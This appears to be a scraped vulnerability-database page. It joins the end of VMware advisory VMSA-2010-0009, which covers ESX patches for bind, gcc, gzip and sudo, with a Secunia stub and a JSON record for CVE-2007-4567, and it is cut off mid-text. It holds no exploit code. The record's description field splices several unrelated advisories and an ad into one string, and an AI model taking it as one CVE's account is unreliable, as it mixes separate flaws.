NOTE: ESX does not use the BIND name service daemon by default.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.0       ESX      ESX400-201005408-SG
ESX            3.5       ESX      not applicable
ESX            3.0.3     ESX      not applicable
ESX            2.5.5     ESX      not applicable

vMA            4.0       RHEL5    affected, patch pending
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

f. Service Console package gcc updated to 3.2.3-60

The GNU Compiler Collection includes front ends for C, C++,
Objective-C, Fortran, Java, and Ada, as well as libraries for these
languages

GNU Libtool's ltdl.c attempts to open .la library files in the
current working directory.  This could allow a local user to gain
privileges via a Trojan horse file.  The GNU C Compiler collection
(gcc) provided in ESX contains a statically linked version of the
vulnerable code, and is being replaced.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-3736 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not applicable

ESX            4.0       ESX      ESX400-201005407-SG
ESX            3.5       ESX      affected, patch pending
ESX            3.0.3     ESX      affected, patch pending
ESX            2.5.5     ESX      affected, patch pending

vMA            4.0       RHEL5    affected, patch pending
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

g. Service Console package gzip update to 1.3.3-15.rhel3

gzip is a software application used for file compression

An integer underflow in gzip's unlzw function on 64-bit platforms
may allow a remote attacker to trigger an array index error
leading to a denial of service (application crash) or possibly
execute arbitrary code via a crafted LZW compressed file.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2010-0001 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.0       ESX      ESX400-201005405-SG
ESX            3.5       ESX      affected, patch pending
ESX            3.0.3     ESX      affected, patch pending
ESX            2.5.5     ESX      affected, patch pending

vMA            4.0       RHEL5    affected, patch pending
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

h. Service Console package sudo updated to 1.6.9p17-6.el5_4

Sudo (su "do") allows a system administrator to delegate authority
to give certain users (or groups of users) the ability to run some
(or all) commands as root or another user while providing an audit
trail of the commands and their arguments.

When a pseudo-command is enabled, sudo permits a match between the
name of the pseudo-command and the name of an executable file in an
arbitrary directory, which allows local users to gain privileges
via a crafted executable file.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2010-0426 to this issue.

When the runas_default option is used, sudo does not properly set
group memberships, which allows local users to gain privileges via
a sudo command.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2010-0427 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.0       ESX      ESX400-201005409-SG
ESX            3.5       ESX      not applicable
ESX            3.0.3     ESX      not applicable
ESX            2.5.5     ESX      not applicable

vMA            4.0       RHEL5    affected, patch pending
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

  • Solution

Please review the patch/release notes for your product and version and verify the md5sum of your downloaded file.

ESX 4.0


http://bit.ly/aqTCqn md5sum: ace37cd8d7c6388edcea2798ba8be939 sha1sum: 8fe7312fe74a435e824d879d4f1ff33df25cee78 http://kb.vmware.com/kb/1013127

Note ESX400-201005001 contains the following security bulletins ESX400-201005404-SG (ntp), ESX400-201005405-SG (gzip), ESX400-201005408-SG (bind), ESX400-201005401-SG (kernel, openssl), ESX400-201005406-SG (krb5, pam_krb5), ESX400-201005402-SG (JRE), ESX400-201005403-SG (expat), ESX400-201005409-SG (sudo), ESX400-201005407-SG (gcc).

  1. References

CVE numbers http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2695 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2908 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3228 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3286 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3547 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3613 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3612 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3620 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3621 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3726 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4567 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4536 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4537 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4538 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6304 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2910 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3080 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3556 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3889 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3939 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4020 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4021 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4138 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4141 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4272 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3563 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4355 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2409 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0590 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1377 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1378 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1379 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1387 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4212 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1384 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0097 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0290 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3736 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0001 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0426 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0427 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0382


  1. Change log

2010-05-27 VMSA-2010-0009 Initial security advisory after release of patch 06 bulletins for ESX 4.0 on 2010-05-27


  1. Contact

E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

This Security Advisory is posted to the following lists:

  • security-announce at lists.vmware.com
  • bugtraq at securityfocus.com
  • full-disclosure at lists.grok.org.uk

E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055

VMware Security Center http://www.vmware.com/security

VMware security response policy http://www.vmware.com/support/policies/security_response.html

General support life cycle policy http://www.vmware.com/support/policies/eos.html

VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html

Copyright 2010 VMware Inc. All rights reserved.

-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (MingW32)

iEYEARECAAYFAkv/V8IACgkQS2KysvBH1xnqNgCcCwwelsQK6DQjcTc2wnIPp0EW E70An2gfkiCQ5FNqvf3y+kNredxyVZwI =JW3s -----END PGP SIGNATURE----- . ----------------------------------------------------------------------

Accurate Vulnerability Scanning No more false positives, no more false negatives

http://secunia.com/vulnerability_scanning/


TITLE: Red Hat update for the kernel

SECUNIA ADVISORY ID: SA38015

VERIFY ADVISORY: http://secunia.com/advisories/38015/

DESCRIPTION: Red Hat has issued an update for the kernel. http://rhn.redhat.com

ORIGINAL ADVISORY: RHSA-2010:0019-1: https://rhn.redhat.com/errata/RHSA-2010-0019.html

OTHER REFERENCES: SA25505: http://secunia.com/advisories/25505/


About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200712-0602",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.21.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.4.36.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.4.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.4.36.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.4.36.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.4.36.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.4.36.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.19.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.36.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.19.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.19.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.18"
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.21.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.21.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.19.6"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3 (x86)"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3 (x86-64)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5 (server)"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.0 (client)"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.2.z (server)"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.3.z (server)"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.4.z (server)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.21.7"
      },
      {
        "model": "vma rhel5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "esx server esx400-201003405",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "esx server esx400-200912403",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "esx server esx400-200909401",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "esx server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "7.10"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "7.10"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "7.10"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "7.10"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "7.04"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "7.04"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "7.04"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "7.04"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.10"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.10"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.10"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.10"
      },
      {
        "model": "linux lts sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "linux lts powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "enterprise virtualization hypervisor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "enterprise linux desktop client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "enterprise linux 5.3.z server",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "enterprise linux 5.2.z server",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "esx server esx400-201005401",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "kernel 2.6.22-rc1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "26943"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001202"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-4567"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200712-303"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18:rc3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18:rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.36.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18:rc5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18:rc4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.21.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.36.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.19.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.21:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.36.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.21.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.36.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.36.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.19.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.19:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18:rc7:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.36:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.19.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18:rc6:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.19.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.36.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.27:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "2.6.21.7",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2007-4567"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Eric Sesterhenn and Victor Julien are credited with discovering this issue.",
    "sources": [
      {
        "db": "BID",
        "id": "26943"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200712-303"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2007-4567",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.8,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2007-4567",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-27929",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2007-4567",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200712-303",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-27929",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2007-4567",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-27929"
      },
      {
        "db": "VULMON",
        "id": "CVE-2007-4567"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001202"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-4567"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200712-303"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The ipv6_hop_jumbo function in net/ipv6/exthdrs.c in the Linux kernel before 2.6.22 does not properly validate the hop-by-hop IPv6 extended header, which allows remote attackers to cause a denial of service (NULL pointer dereference and kernel panic) via a crafted IPv6 packet. \nAttackers can exploit this issue to cause a kernel panic, denying service to legitimate users. This vulnerability is related to CVE-2007-4567. (CVE-2006-6058)\n\nCertain calculations in the hugetlb code were not correct. (CVE-2007-4567)\n\nPermissions were not correctly stored on JFFS2 ACLs. (CVE-2007-4997)\n\nThe Philips USB Webcam driver did not correctly handle disconnects.  Only Ubuntu\n7.10 contained the vulnerable code, and it is believed not to have\nbeen exploitable. (CVE-2007-5501)\n\nWhen mounting the same remote NFS share to separate local locations, the\nfirst location\u0027s mount options would apply to all subsequent mounts of the\nsame NFS share. \n\n----------------------------------------------------------------------\n\nA new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI\nhas been released. The new version includes many new and advanced\nfeatures, which makes it even easier to stay patched. \n\nDownload and test it today:\nhttps://psi.secunia.com/\n\nRead more about this new version:\nhttps://psi.secunia.com/?page=changelog\n\n----------------------------------------------------------------------\n\nTITLE:\nUbuntu update for kernel\n\nSECUNIA ADVISORY ID:\nSA28170\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/28170/\n\nCRITICAL:\nModerately critical\n\nIMPACT:\nDoS\n\nWHERE:\n\u003eFrom remote\n\nOPERATING SYSTEM:\nUbuntu Linux 7.10\nhttp://secunia.com/product/16251/\nUbuntu Linux 